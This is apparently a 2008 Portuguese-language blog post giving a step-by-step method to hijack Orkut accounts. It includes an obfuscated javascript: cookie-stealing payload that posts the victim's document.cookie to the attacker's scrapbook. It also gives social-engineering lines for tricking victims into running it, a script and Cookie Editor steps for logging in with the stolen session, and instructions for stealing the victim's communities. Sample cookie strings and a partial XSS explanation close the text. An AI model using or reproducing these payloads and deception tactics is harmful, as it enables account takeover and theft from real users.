sexta-feira, 22 de fevereiro de 2008

Hackeando o orkut

нα¢кєя м4тя1χ ρя

Invadindo perfil no orkut

Para invadir um perfil no orkut vc vai ter que precisar ter o MOZILA FIREFOX instalado no seu PC,ter o editor de cookie do mozila firefox,e um JavaScript que vc irá utilizar,
para mandar para a vítima executar,e roubar os cookies...

Detalhe:Esse truque só funciona se a vítima tiver o mozila firefox instalado no PC.
Engane a vítima e diga para ela q precisa desse browser para executar o código JAVASCRIPT..se ela perguntar pra que serve o código,diga que é um código pra colocar
cor,ou invente qualquer coisa,use Engenharia Social!@@@@

1°passo-
Caso vc não tenha o Mozila Firefox instale ele...no Baixaki Download

Link pra download-
http://baixaki.ig.com.br/site/dwnld20518.htm

2ºpasso-
Depois de instalado o mozila firefox,use o mozila firefox para instalar o editor de cookie do firefox,que vc vai ter que precisar pra editar os cookies do orkut

Link pra download-
https://addons.mozilla.org/en-US/firefox/addon/573

aonde tá escrito works with,e tem a versão do mozila firefox,para instalar o editor de cookie,clique no botão INSTALL NOW e baixe o editor de cookie,depois de instalado o browser irá reiniciar,depois entre no orkut...

3°passo -clique em ver perfil,e execute esse código JavaScript para pegar seu GID...

javascript:void(prompt('',document.body.
innerHTML.match(/http:\/\/\w+.orkut.com\/images\/\w+\/\d+\/([0-9]+).jpg/gi).toString().replace(/http:\/\/\w+.orkut.com\/images\/\w+\/\d+\/([0-9]+).jpg/gi,'$1')))

depois copie somente os 8 primeiros números que estão atrás da vírgula.

Agora coloque esse número no seguinte javascript substindo os números aonde
tem escrito toUserId.value=12345678; vc troca pelo o seu GID que vc pegou antes..

javascript:nobody=replyForm;nobody.toUse
rId.value=33495384;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));nobody.action='Scrapbook.aspx?Action.submit';nobody.submit()

exemplo: toUserId.value=Seu_GID(os primeiros 8 números depois da primeira vírgula..

exemplo: Se seu GID for 12345678,ficará assim:

javascript:nobody=replyForm;nobody.toUse
rId.value=12345678;nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));nobody.action='Scrapbook.aspx?Action.submit';nobody.submit()

agora peça que a vítima execute o código JAVASCRIPT na barra de endereços,aonde
se digita o nome do site www.site.com.br.. Lembrando que só vai funcionar
se o a vítima tiver o mozila firefox instalado no seu PC...
Veja seu SCRABOOK(Livro de RECADOS)lá terá o cookie da vítima...

agora que vc já tem o cookie da vítima para se logar,

execute esse código no seu perfil,irá abrir uma janela de prompt do JavaScript:

javascript:function logaCookie(value){var newCookie="orkut_state="+value+";domain=
.orkut.com";document.cookie=newCookie;location="Home.aspx"};state=prompt('Coloque os biscoitos do Cidadao','');logaCookie(state);void(0)

e digite o cookie da vítima...

Sendo que um cookie costuma ser bem assim:

ORKUTPREF=ID=7069351988147316884:INF=0:S
ET=111236436:LNG=79:CNT=0:
RM=0:USR=ZmFrZV8xMl9mYWtlXzEyQHlhaG9vLmN
vbS5icg==:PHS=:TS=1181475597:LCL=pt-BR:NET=1:
TOS=2147483647:GC=DQAAAnkkjhkhU_PAvfGVmb
6iRF6VPVvHEoTK8mKFqUTwPtGgZfeUE-TJH9ZFJ6h2vdFR_dXDgqz6237XHbreKaS6f3lbuUcc6n-FKi484Fd0SgEq3sKtHXVs-MFcOJhmbSmiJnYKnH5hc7ttcCeVY5udrIWHxd9Zjs0rfmr9BWTEjMRD7Q:
PE=ZmFrZV8xMl9mYWtlXzEyQHlhaG9vLmNvbS5ic
g==:GTI=0:GID=:VER=2:S=bj+6NisC7TewtkGC0

agora vc pega o cookie da vitíma e digita na janela de prompt do JavaScript..
depois de logado no cookie da vítima para transferir uma comunidade:

Logue no perfil que irá receber os cookies da vítima e em seguida coloque os cookies
da vítima.Vá na comunidade a ser roubada procure pelo o perfil que irá receber a
comunidade clique em gerenciar e transferir comunidade para o usuário.Irá te pedir a senha logue com o cookie da vítima e pronto comunidade trasnferida....

2ºMetódo

Ou baixe o editor de cookie do mozila firefox,disponível no site:

https://addons.mozilla.org/en-US/firefox/addon/573

e se já tiver instalado vá na aba ferramentas clique em Cookie Editor,
procure por www.orkut.com aonde tem escrito: orkut_state (na ABA COOKIE NAME)

clique em EDIT,e digita o cookie da vítima,que vc roubou....

exemplo:
(COOKIE VÌTIMA)
ORKUTPREF=ID=12713021477779532739:INF=0:
SET=111236439:LNG=79:CNT=29:RM=0:
USR=cmliZWlyb190aWdAaG90bWFpbC5jb20=:PHS
=:TS=1190287643:
LCL=pt-BR:NET=1:TOS=2147483647:
GC=DQAAAHAAAACJz3A9CqNcKjLQZUyK1mVgtxXr4
oHYRZ8AYAvCEXy8TANYKKwbnELmDXANWNLTWfAOoVijezRfkZge3nC2a0wq66AtQwAMGWHYbNXroYmjDovlDpoxtWYeEUUkwFjk20rOiBD1oPGZyrWZGIpkA825:
PE=dGlnMTNAd2FsbGEuY29t:GTI=0:GID=:VER=2
:S=DnV6SRmVNQHtwpdPTgUFU05GXQA=:

depois clique em SAVE e pronto clica em INICIO,e voíla!@@@Vc
estará logado com o perfil,usando o cookie da vítima que vc roubou...!@@

oBS:Não me responsabilizo pelo o que vc venha cometer...
Lembrando que conhecimento não é crime....

e que para a comunidade HACKER,roubar orkut é um ato totalmente LAMMER...

ainda mais se vc ficar se achando que é o "SUPER -HACKER" só porque sabe invadir profiles de orkut.....SAIBAM que o verdadeiro HACKER é o indíviduo,que não fica se achando o HACKER,com os outros (o que é uma atitude LAMMER),e sabe Programar,
e tudo sobre computadores,sem desvalorizar ou desmerecer o trabalho de nínquem...

então não fique se achando o "super HACKER" por essa técnica de invasão de perfil do orkut com os outros,pois ninquém vai gostar disso..

Para detalhes de segurança da computação:

A técnica conhecida do orkut é chamada XSS(Cross-Site Scripting),utilizando se
de uma vulnerabilidade de uma aplicação WEB ou programa de navegação(BROWSER),
na qual o invasor usa um código ou SCRIPT malicioso para um usuário final(VÌTIMA)...

A vítima ao executar o código malicioso enviado pelo o invasor tem seu cookie